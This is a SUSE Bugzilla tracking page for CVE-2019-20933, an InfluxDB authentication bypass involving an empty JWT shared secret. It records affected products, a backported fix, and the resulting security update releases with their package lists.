Bug 1178988 - (CVE-2019-20933) VUL-0: CVE-2019-20933: influxdb: authentication bypass in the authenticate function in services/httpd/handler.go
(CVE-2019-20933)
VUL-0: CVE-2019-20933: influxdb: authentication bypass in the authenticate fu...
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P2 - High : Major
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/272037/
CVSSv3.1:SUSE:CVE-2019-20933:7.5:(AV:...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2020-11-19 16:07 UTC by Alexandros Toptsoglou
Modified: 2021-11-09 20:35 UTC (History)
4 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Alexandros Toptsoglou 2020-11-19 16:07:43 UTC
CVE-2019-20933

InfluxDB before 1.7.6 has an authentication bypass vulnerability in the
authenticate function in services/httpd/handler.go because a JWT token may have
an empty SharedSecret (aka shared secret).

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20933
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20933
https://github.com/influxdata/influxdb/commit/761b557315ff9c1642cf3b0e5797cd3d983a24c0
https://github.com/influxdata/influxdb/compare/v1.7.5...v1.7.6
https://github.com/influxdata/influxdb/issues/12927
Comment 1 Alexandros Toptsoglou 2020-11-19 16:08:34 UTC
Tracked Cloud 7,8,9 as affected. OpenSUSE Leap 15.2 and Factory are already fixed.
Comment 3 Johannes Grassler 2020-11-24 10:58:28 UTC
Patch backported and tested against Cloud 7, Cloud 8 and Cloud 9. Requests created for all three:

* https://build.opensuse.org/request/show/850397 (Cloud 7)
* https://build.opensuse.org/request/show/850398 (Cloud 8)
* https://build.opensuse.org/request/show/850411 (Cloud 9)
Comment 6 Swamp Workflow Management 2020-12-04 17:18:11 UTC
SUSE-SU-2020:3624-1: An update that fixes 5 vulnerabilities, contains one feature is now available.

Category: security (moderate)
Bug References: 1005886,1170479,1177120,1178243,1178988
CVE References: CVE-2016-8611,CVE-2019-20933,CVE-2019-9740,CVE-2020-24303,CVE-2020-26137
JIRA References: SOC-11240
Sources used:
SUSE OpenStack Cloud 7 (src):    crowbar-openstack-4.0+git.1604938545.30c10db18-9.77.1, grafana-6.7.4-1.20.1, influxdb-1.2.4-5.1, python-urllib3-1.16-3.12.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 9 Swamp Workflow Management 2020-12-21 17:16:49 UTC
SUSE-SU-2020:3896-1: An update that solves 6 vulnerabilities, contains one feature and has one errata is now available.

Category: security (important)
Bug References: 1117080,1125815,1132174,1132323,1178243,1178988,1179161
CVE References: CVE-2016-10745,CVE-2018-17954,CVE-2019-10906,CVE-2019-20933,CVE-2019-8341,CVE-2020-24303
JIRA References: SOC-11240
Sources used:
SUSE OpenStack Cloud Crowbar 8 (src):    crowbar-core-5.0+git.1606840757.839a64745-3.47.1, crowbar-openstack-5.0+git.1604938523.ded915845-4.46.1, grafana-6.7.4-4.15.1, influxdb-1.3.4-4.3.1, openstack-heat-templates-0.0.0+git.1605509190.64f020b-3.18.1, openstack-nova-16.1.9~dev77-3.42.1, openstack-nova-doc-16.1.9~dev77-3.42.1, python-Jinja2-2.9.6-3.3.1, rubygem-crowbar-client-3.9.3-3.15.1
SUSE OpenStack Cloud 8 (src):    grafana-6.7.4-4.15.1, influxdb-1.3.4-4.3.1, openstack-heat-templates-0.0.0+git.1605509190.64f020b-3.18.1, openstack-nova-16.1.9~dev77-3.42.1, openstack-nova-doc-16.1.9~dev77-3.42.1, python-Jinja2-2.9.6-3.3.1, venv-openstack-aodh-5.1.1~dev7-12.30.1, venv-openstack-barbican-5.0.2~dev3-12.31.1, venv-openstack-ceilometer-9.0.8~dev7-12.28.1, venv-openstack-cinder-11.2.3~dev29-14.32.1, venv-openstack-designate-5.0.3~dev7-12.29.1, venv-openstack-freezer-5.0.0.0~xrc2~dev2-10.26.1, venv-openstack-glance-15.0.3~dev3-12.29.1, venv-openstack-heat-9.0.8~dev22-12.31.1, venv-openstack-ironic-9.1.8~dev8-12.31.1, venv-openstack-keystone-12.0.4~dev11-11.32.1, venv-openstack-magnum-5.0.2_5.0.2_5.0.2~dev31-11.30.1, venv-openstack-manila-5.1.1~dev5-12.35.1, venv-openstack-monasca-2.2.2~dev1-11.26.1, venv-openstack-monasca-ceilometer-1.5.1_1.5.1_1.5.1~dev3-8.26.1, venv-openstack-murano-4.0.2~dev2-12.26.1, venv-openstack-neutron-11.0.9~dev69-13.34.1, venv-openstack-nova-16.1.9~dev77-11.32.1, venv-openstack-octavia-1.0.6~dev3-12.31.1, venv-openstack-sahara-7.0.5~dev4-11.30.1, venv-openstack-trove-8.0.2~dev2-11.30.1
HPE Helion Openstack 8 (src):    grafana-6.7.4-4.15.1, influxdb-1.3.4-4.3.1, openstack-heat-templates-0.0.0+git.1605509190.64f020b-3.18.1, openstack-nova-16.1.9~dev77-3.42.1, openstack-nova-doc-16.1.9~dev77-3.42.1, python-Jinja2-2.9.6-3.3.1, venv-openstack-aodh-5.1.1~dev7-12.30.1, venv-openstack-barbican-5.0.2~dev3-12.31.1, venv-openstack-ceilometer-9.0.8~dev7-12.28.1, venv-openstack-cinder-11.2.3~dev29-14.32.1, venv-openstack-designate-5.0.3~dev7-12.29.1, venv-openstack-freezer-5.0.0.0~xrc2~dev2-10.26.1, venv-openstack-glance-15.0.3~dev3-12.29.1, venv-openstack-heat-9.0.8~dev22-12.31.1, venv-openstack-ironic-9.1.8~dev8-12.31.1, venv-openstack-keystone-12.0.4~dev11-11.32.1, venv-openstack-magnum-5.0.2_5.0.2_5.0.2~dev31-11.30.1, venv-openstack-manila-5.1.1~dev5-12.35.1, venv-openstack-monasca-2.2.2~dev1-11.26.1, venv-openstack-monasca-ceilometer-1.5.1_1.5.1_1.5.1~dev3-8.26.1, venv-openstack-murano-4.0.2~dev2-12.26.1, venv-openstack-neutron-11.0.9~dev69-13.34.1, venv-openstack-nova-16.1.9~dev77-11.32.1, venv-openstack-octavia-1.0.6~dev3-12.31.1, venv-openstack-sahara-7.0.5~dev4-11.30.1, venv-openstack-trove-8.0.2~dev2-11.30.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 10 Swamp Workflow Management 2020-12-21 17:18:35 UTC
SUSE-SU-2020:3897-1: An update that solves 7 vulnerabilities, contains 8 features and has one errata is now available.

Category: security (important)
Bug References: 1125815,1132174,1132323,1160851,1177120,1177611,1178243,1178988
CVE References: CVE-2016-10745,CVE-2019-10906,CVE-2019-20933,CVE-2019-8341,CVE-2020-24303,CVE-2020-26137,CVE-2020-5390
JIRA References: SCRD-8681,SOC-11184,SOC-11240,SOC-11391,SOC-7751,SOC-8764,SOC-9178,SOC-9781
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    crowbar-core-6.0+git.1606314264.bf9ada813-3.31.2, crowbar-openstack-6.0+git.1604573541.bb18c172d-3.28.3, grafana-6.7.4-3.20.1, influxdb-1.3.8-4.3.3, openstack-cinder-13.0.10~dev20-3.28.2, openstack-heat-11.0.4~dev4-3.19.2, openstack-heat-gbp-12.0.1~dev2-3.3.4, openstack-heat-templates-0.0.0+git.1605509190.64f020b6-3.9.3, openstack-horizon-plugin-gbp-ui-12.0.1~dev3-3.3.4, openstack-ironic-python-agent-3.3.4~dev6-3.19.4, openstack-manila-7.4.2~dev57-4.30.2, openstack-neutron-13.0.8~dev135-3.31.2, openstack-neutron-gbp-12.0.1~dev5-3.19.4, openstack-neutron-vpnaas-13.0.2~dev6-3.9.2, openstack-nova-18.3.1~dev77-3.31.2, python-Jinja2-2.10.1-3.3.3, python-pysaml2-4.5.0-4.3.3, python-pytest-3.7.4-3.3.3, python-urllib3-1.23-3.15.3, release-notes-suse-openstack-cloud-9.20200917-3.24.3, spark-2.2.3-5.3.3
SUSE OpenStack Cloud 9 (src):    ardana-cassandra-9.0+git.1600802664.7e480a2-3.6.2, ardana-mq-9.0+git.1605174486.a78ddce-3.19.2, ardana-osconfig-9.0+git.1601621747.a87e5a0-3.22.2, ardana-tempest-9.0+git.1603378983.fc0bca9-3.19.2, grafana-6.7.4-3.20.1, influxdb-1.3.8-4.3.3, openstack-cinder-13.0.10~dev20-3.28.2, openstack-heat-11.0.4~dev4-3.19.2, openstack-heat-gbp-12.0.1~dev2-3.3.4, openstack-heat-templates-0.0.0+git.1605509190.64f020b6-3.9.3, openstack-horizon-plugin-gbp-ui-12.0.1~dev3-3.3.4, openstack-ironic-python-agent-3.3.4~dev6-3.19.4, openstack-manila-7.4.2~dev57-4.30.2, openstack-neutron-13.0.8~dev135-3.31.2, openstack-neutron-gbp-12.0.1~dev5-3.19.4, openstack-neutron-vpnaas-13.0.2~dev6-3.9.2, openstack-nova-18.3.1~dev77-3.31.2, python-Jinja2-2.10.1-3.3.3, python-pysaml2-4.5.0-4.3.3, python-pytest-3.7.4-3.3.3, python-urllib3-1.23-3.15.3, release-notes-suse-openstack-cloud-9.20200917-3.24.3, spark-2.2.3-5.3.3, venv-openstack-barbican-7.0.1~dev24-3.21.2, venv-openstack-cinder-13.0.10~dev20-3.24.2, venv-openstack-designate-7.0.2~dev2-3.21.2, venv-openstack-glance-17.0.1~dev30-3.19.2, venv-openstack-heat-11.0.4~dev4-3.21.2, venv-openstack-horizon-14.1.1~dev7-4.23.2, venv-openstack-ironic-11.1.5~dev16-4.19.2, venv-openstack-keystone-14.2.1~dev4-3.21.2, venv-openstack-magnum-7.2.1~dev1-4.21.2, venv-openstack-manila-7.4.2~dev57-3.25.2, venv-openstack-monasca-2.7.1~dev10-3.19.2, venv-openstack-monasca-ceilometer-1.8.2~dev3-3.21.2, venv-openstack-neutron-13.0.8~dev135-6.23.2, venv-openstack-nova-18.3.1~dev77-3.23.2, venv-openstack-octavia-3.2.3~dev7-4.21.2, venv-openstack-sahara-9.0.2~dev15-3.21.2, venv-openstack-swift-2.19.2~dev48-2.16.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 11 Wolfgang Frisch 2021-05-06 16:44:29 UTC
Released.